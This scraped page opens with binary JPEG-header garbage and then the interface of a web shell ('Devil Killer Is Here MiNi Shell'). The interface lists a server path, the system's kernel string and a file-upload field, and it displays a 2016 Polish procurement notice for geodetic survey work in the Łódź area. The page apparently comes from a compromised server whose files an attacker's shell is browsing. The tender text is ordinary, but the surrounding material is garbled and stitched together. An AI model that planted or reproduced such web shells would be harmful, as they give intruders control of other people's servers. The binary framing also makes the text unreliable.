JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160330/70898-N-2016.html

<p class="kh_header"><b>Łódź: Wykonanie prac geodezyjnych</b><br>
<b>Numer ogłoszenia: 70898 - 2016; data zamieszczenia: 30.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Łódzki Wschodni reprez. przez Zarząd Powiatu , ul. Sienkiewicza 3, 90-954 Łódź, tel. 0-42 6337191, 6335575, faks 0-42 6329311.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lodzkiwschodni.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac geodezyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie składa się z następujących części (zadań) opisanych poniżej:

Zadanie Nr 1 
Przedmiotem zamówienia jest wykonanie weryfikacji użytków w ewidencji gruntów                                              i budynków w celu doprowadzenia zgodności baz danych ze stanem faktycznym w terenie dla nieruchomości Skarbu Państwa położonych w mieście Koluszki, obręb 6 oznaczonych w ewidencji gruntów i budynków jako działka nr: 105/3, 105/4, 105/5, 105/6, 105/7, 105/8, 105/9, 105/11, 105/13, 105/14, 105/16, 105/17, 105/19, 105/20, 105/21.

Zadanie Nr 2 
Przedmiotem zamówienia jest wykonanie weryfikacji danych oraz użytków w ewidencji gruntów i budynków w celu usunięcia z części opisowej i graficznej kartoteki budynków, naniesień które zostały rozebrane z nieruchomości Skarbu Państwa położonej w Tuszynie, obrębie 16, oznaczonej w ewidencji gruntów i budynków jako działka nr: 12/3 (obecne działki nr 12/4, 12/5, 12/6, 12/9, 12/13). 

Zadanie Nr 3
Przedmiotem zamówienia jest sporządzenie opinii prawno - geodezyjnej przedstawiającej stan prawny, stan historyczny, stan faktyczny w latach 1930-1965 i w latach 1965-1998, dla nieruchomości położonej w mieście Tuszyn, w obrębie 20, oznaczonej aktualnie w ewidencji gruntów jako część działki nr 1 (część działki nr 1 na odcinku z działką nr 2) oraz jako działka nr ew. 2, poprzez zebranie i analizę dokumentacji historycznej, prawnej i geodezyjnej dla ww. działek wraz z rozliczeniem ich powierzchni. Opinia geodezyjna jest niezbędna w postępowaniu prowadzonym o ustalenie odszkodowania za część nieruchomości zajętej pod drogę publiczną, gminną - ulicę Górecką położoną w Tuszynie, oznaczoną jako część działki nr 1 i ma na celu ustalenie czy część spornej nieruchomości została zajęta pod drogę publiczną - ulice Górecką. 
Zadanie Nr 4
Przedmiotem zamówienia jest wykonanie mapy sytuacyjnej do celów prawnych dla nieruchomości położonej w obrębie 6 miasta Koluszki, oznaczonej w ewidencji gruntów jako działka Nr 99 o powierzchni 0,2461ha. Na aktualną działkę ewidencyjną Nr 99 składają się dawne działki Nr: 759/3, 747/7, 749/4, 759/4, 758/2, 850/2., stanowiące części dawnych działek Nr 759, 747, 749, 759, 758, 850. 
Działki Nr 759/3, 759/4 zostały wywłaszczone na rzecz Państwa decyzją Naczelnika Powiatu w Brzezinach G-.VIII-219/5/74 z dnia 11.04.1974r. 
Działka Nr 749/4 została wywłaszczona na rzecz Państwa decyzją Naczelnika Powiatu w Brzezinach G-VIII-219/5/74 z dnia 23.04.1974r. 
Powierzchnia opracowania wynosi 3,5241ha. 
Orientacyjnie objętych opracowaniem jest 15 działek ewidencyjnych Nr: 99, 98, 95/1, 95/2, 3334, 3333/1, 3331/2, 3326, 3313, 3312, 3060, 3059, 3058, 3057, 3056. 

Zadanie Nr 5
Przedmiotem zamówienia jest wykonanie mapy sytuacyjnej do celów prawnych dla nieruchomości położonej w Romanowie, gmina Rzgów, oznaczonej w ewidencji gruntów jako działka Nr 11 o powierzchni 12,21052ha. Działka Nr 11 powstała z połączenia działek wchodzących w skład indywidualnych gospodarstw rolnych i objęła działki o dawnych numerach: 188/3, 189/3, 190, 191, 192, 193, 194, 195, 196. Nie dysponujemy pierwotnym tytułem własności do działki Nr 193. Do wszystkich działek posiadamy decyzje o przejęciu ww. działek na rzecz Skarbu Państwa. 

Zaleca się Wykonawcom zapoznanie się z dokumentacją prawno-geodezyjną znajdującą się w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej dla Powiatu Łódzkiego Wschodniego, Łódź ul. Tuwima 28.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.43.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający oceni spełnienie tego warunku udziału w postępowaniu wg. formuły spełnia - nie spełnia, na podstawie oświadczenia załączonego do oferty, wskazanego w specyfikacji istotnych warunków zamówienia opracowanej dla przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający oceni spełnienie tego warunku udziału w postępowaniu wg. formuły spełnia - nie spełnia, na podstawie oświadczenia załączonego do oferty, wskazanego w specyfikacji istotnych warunków zamówienia opracowanej dla przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający oceni spełnienie tego warunku udziału w postępowaniu wg. formuły spełnia - nie spełnia, na podstawie oświadczenia załączonego do oferty, wskazanego w specyfikacji istotnych warunków zamówienia opracowanej dla przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej 1 osobą, która będzie uczestniczyć w wykonywaniu zamówienia i która posiada uprawnienia zawodowe w dziedzinie geodezji i kartografii z zakresu art. 43 pkt 1 i 2 ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (t. j. Dz. U. z 2015 r., poz. 520 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający oceni spełnienie tego warunku udziału w postępowaniu wg. formuły spełnia - nie spełnia, na podstawie oświadczenia załączonego do oferty, wskazanego w specyfikacji istotnych warunków zamówienia opracowanej dla przedmiotowego postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Wydłużenie okresu gwarancji i rękojmi (powyżej 36 miesięcy) - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany w umowie w stosunku do treści oferty w przypadku: 1) wystąpienia zdarzeń losowych o charakterze siły wyższej, których skutki uniemożliwiłyby wykonanie przedmiotowej umowy zgodnie z jej treścią. Wówczas może zostać zmieniony termin zakończenia prac, o czas niezbędny do wykonania zamówienia, 2) zmiany przepisów prawnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lodzkiwschodni.pl/138,zamowienia-powyzej-30-tysiecy-euro.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Łodzi ul. Sienkiewicza 3, 90-954 Łódź, IX piętro pokój nr 902.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2016 godzina 11:00, miejsce: Kancelaria Starostwa Powiatowego w Łodzi, Łódź ul. Sienkiewicza 3, pokój nr 809, VIII piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W przypadku, gdy zostanie wybrana jako najkorzystniejsza oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawca przed podpisaniem umowy na wezwanie Zamawiającego przedłoży umowę regulującą współpracę wykonawców, w której wskażą pełnomocnika uprawnionego do kontaktów z Zamawiającym oraz wystawiania dokumentów związanych z płatnościami.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie prac geodezyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 1 
Przedmiotem zamówienia jest wykonanie weryfikacji użytków w ewidencji gruntów                                              i budynków w celu doprowadzenia zgodności baz danych ze stanem faktycznym w terenie dla nieruchomości Skarbu Państwa położonych w mieście Koluszki, obręb 6 oznaczonych w ewidencji gruntów i budynków jako działka nr: 105/3, 105/4, 105/5, 105/6, 105/7, 105/8, 105/9, 105/11, 105/13, 105/14, 105/16, 105/17, 105/19, 105/20, 105/21. Zaleca się Wykonawcom zapoznanie się z dokumentacją prawno-geodezyjną znajdującą się w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej dla Powiatu Łódzkiego Wschodniego, Łódź ul. Tuwima 28.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.43.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Wydłużenie okresu gwarancji i rękojmi (powyżej 36 miesięcy) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie prac geodezyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 2 
Przedmiotem zamówienia jest wykonanie weryfikacji danych oraz użytków w ewidencji gruntów i budynków w celu usunięcia z części opisowej i graficznej kartoteki budynków, naniesień które zostały rozebrane z nieruchomości Skarbu Państwa położonej w Tuszynie, obrębie 16, oznaczonej w ewidencji gruntów i budynków jako działka nr: 12/3 (obecne działki nr 12/4, 12/5, 12/6, 12/9, 12/13). Zaleca się Wykonawcom zapoznanie się z dokumentacją prawno-geodezyjną znajdującą się w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej dla Powiatu Łódzkiego Wschodniego, Łódź ul. Tuwima 28..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.43.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Wydłużenie okresu gwarancji i rękojmi (powyżej 36 miesięcy) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie prac geodezyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 3
Przedmiotem zamówienia jest sporządzenie opinii prawno - geodezyjnej przedstawiającej stan prawny, stan historyczny, stan faktyczny w latach 1930-1965 i w latach 1965-1998, dla nieruchomości położonej w mieście Tuszyn, w obrębie 20, oznaczonej aktualnie w ewidencji gruntów jako część działki nr 1 (część działki nr 1 na odcinku z działką nr 2) oraz jako działka nr ew. 2, poprzez zebranie i analizę dokumentacji historycznej, prawnej i geodezyjnej dla ww. działek wraz z rozliczeniem ich powierzchni. Opinia geodezyjna jest niezbędna w postępowaniu prowadzonym o ustalenie odszkodowania za część nieruchomości zajętej pod drogę publiczną, gminną - ulicę Górecką położoną w Tuszynie, oznaczoną jako część działki nr 1 i ma na celu ustalenie czy część spornej nieruchomości została zajęta pod drogę publiczną - ulice Górecką. Zaleca się Wykonawcom zapoznanie się z dokumentacją prawno-geodezyjną znajdującą się w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej dla Powiatu Łódzkiego Wschodniego, Łódź ul. Tuwima 28.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.43.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Wydłużenie okresu gwarancji i rękojmi (powyżej 36 miesięcy) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie prac geodezyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 4
Przedmiotem zamówienia jest wykonanie mapy sytuacyjnej do celów prawnych dla nieruchomości położonej w obrębie 6 miasta Koluszki, oznaczonej w ewidencji gruntów jako działka Nr 99 o powierzchni 0,2461ha. Na aktualną działkę ewidencyjną Nr 99 składają się dawne działki Nr: 759/3, 747/7, 749/4, 759/4, 758/2, 850/2., stanowiące części dawnych działek Nr 759, 747, 749, 759, 758, 850. 
Działki Nr 759/3, 759/4 zostały wywłaszczone na rzecz Państwa decyzją Naczelnika Powiatu w Brzezinach G-.VIII-219/5/74 z dnia 11.04.1974r. 
Działka Nr 749/4 została wywłaszczona na rzecz Państwa decyzją Naczelnika Powiatu w Brzezinach G-VIII-219/5/74 z dnia 23.04.1974r. 
Powierzchnia opracowania wynosi 3,5241ha. 
Orientacyjnie objętych opracowaniem jest 15 działek ewidencyjnych Nr: 99, 98, 95/1, 95/2, 3334, 3333/1, 3331/2, 3326, 3313, 3312, 3060, 3059, 3058, 3057, 3056. Zaleca się Wykonawcom zapoznanie się z dokumentacją prawno-geodezyjną znajdującą się w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej dla Powiatu Łódzkiego Wschodniego, Łódź ul. Tuwima 28..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.43.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Wydłużenie okresu gwarancji i rękojmi (powyżej 36 miesięcy) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie prac geodezyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 5
Przedmiotem zamówienia jest wykonanie mapy sytuacyjnej do celów prawnych dla nieruchomości położonej w Romanowie, gmina Rzgów, oznaczonej w ewidencji gruntów jako działka Nr 11 o powierzchni 12,21052ha. Działka Nr 11 powstała z połączenia działek wchodzących w skład indywidualnych gospodarstw rolnych i objęła działki o dawnych numerach: 188/3, 189/3, 190, 191, 192, 193, 194, 195, 196. Nie dysponujemy pierwotnym tytułem własności do działki Nr 193. Do wszystkich działek posiadamy decyzje o przejęciu ww. działek na rzecz Skarbu Państwa. 
Zaleca się Wykonawcom zapoznanie się z dokumentacją prawno-geodezyjną znajdującą się w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej dla Powiatu Łódzkiego Wschodniego, Łódź ul. Tuwima 28..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.43.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
